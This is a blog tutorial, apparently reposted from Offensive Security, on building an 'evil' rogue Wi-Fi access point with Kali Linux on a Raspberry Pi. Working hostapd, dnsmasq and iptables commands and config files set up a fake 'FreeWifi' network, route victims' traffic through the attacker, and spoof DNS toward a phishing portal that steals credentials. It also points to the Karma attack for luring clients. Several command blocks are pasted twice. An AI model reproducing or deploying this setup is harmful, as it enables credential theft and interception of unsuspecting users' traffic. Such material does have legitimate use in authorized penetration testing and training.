http://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point
A few days ago, we had the opportunity
to deploy a rogue access point that would steal user credentials using a
fake, captive web portal, and provide MITM’d Internet services via 3G.
We needed reliability and scalability in our environment as there would
potentially be a large amount of, erm….”participants” in this wireless
network. We were pretty happy with the result and quickly realized that
we had created a new “Kali Linux recipe”. Or in other words, we could create a custom, bootable wireless evil access point image, which could do all sorts of wondrous things.
Required Hardware
-
We used a battery-powered Raspberry Pi for this project, however the instructions below will work on pretty much anything that can run Kali Linux and has 2 free USB ports – ARM and virtual environments included.
-
A supported USB wireless adapter; we used an old Netgear WNA1000 we had lying around.
-
A supported 3G modem; we found a TP-Link MA180 3.75G HSUPA USB Adapter in a local shop.
Simple Setup of DNS and DHCP
We ended up building our wireless access point using hostapd and dnsmasq
using a relatively simple setup. We found that this gave the most
reliable performance and was the easiest to configure. In addition,
using dnsmasq allowed us to easily control spoofed DNS queries. We start
by installing all our prerequisites:
apt-get install -y hostapd dnsmasq wireless-tools iw wvdial
Once everything is installed, we
configure dnsmasq to serve DHCP and DNS on the wireless interface and
then start the dnsmasq service.
sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd
cat <<EOF > /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF
service start dnsmasq
cat <<EOF > /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF
service start dnsmasq
Setting up the 3G Connection
This part was surprisingly simple using
the Gnome NetworkManager GUI interface. Adding a new 3G connection and
going through the automated wizard got us online in a couple of minutes.
Once connected, we saw our new ppp0 WAN interface, now providing us
with Internet access. Alternatively, this setup can be performed at the
command line using wvdial. Now that we have our WAN connection setup, let’s move on to setting up the wireless access point.
Setting up the Wireless Access Point
Setting up the access point is a
breeze using hostapd. We configure an IP for the wireless interface, and
configure iptables rules for NAT. Then we quickly configure the hostapd
service to use our wireless interface to run an access point with the
SSID “FreeWifi”. Once the service is started a wireless network called
“FeeWifi” should show up. Anyone connecting to this network would be
routed thorough our Kali box, out to the internet over 3g.
ifconfig wlan0 up
ifconfig wlan0 10.0.0.1/24
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o ppp0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
cat <<EOF > /etc/hostapd/hostapd.conf
interface=wlan0
driver=nl80211
ssid=FreeWifi
channel=1
# Yes, we support the Karma attack.
#enable_karma=1
EOF
service start hostapd
ifconfig wlan0 10.0.0.1/24
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o ppp0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
cat <<EOF > /etc/hostapd/hostapd.conf
interface=wlan0
driver=nl80211
ssid=FreeWifi
channel=1
# Yes, we support the Karma attack.
#enable_karma=1
EOF
service start hostapd
Bootable Kali Access Point ISO Recipe
Using live-build, we can create a custom
Kali Linux ISO image that will boot up into a “rogue AP”. Certain
elements such as the wireless and 3G interface names (wlan0, ppp0, etc)
would be pre-configured during the live-build process. We’ve gone ahead
and set up a Kali Recipe which worked perfectly in our VMware environment, with both the wireless card and 3G modem connected to the VM at boot time.
Doing the Evil Stuff
There’s a whole bunch of evil stuff to
be done once we’re in the middle of communications. MITM tools like
responder, evilgrade and sslsplit come to mind. In our case, selectively
spoofing DNS queries and redirecting users to our own phishing site was
sufficient for our task. Lastly, we’ve added the Karma patch to our
hostapd package, which causes the AP to probe requests not just for
itself but for any ESSID requested. This allows the AP to act as a lure
to draw in any clients probing for known networks. Let the games begin!
Looking for more cool stuff? Kali linux Dojo
Looking for more cool stuff to do with
Kali Linux? Want to get some mind bending hands-on experience with the
distribution? You should check out our Kali Linux Dojo!
No comments:
Post a Comment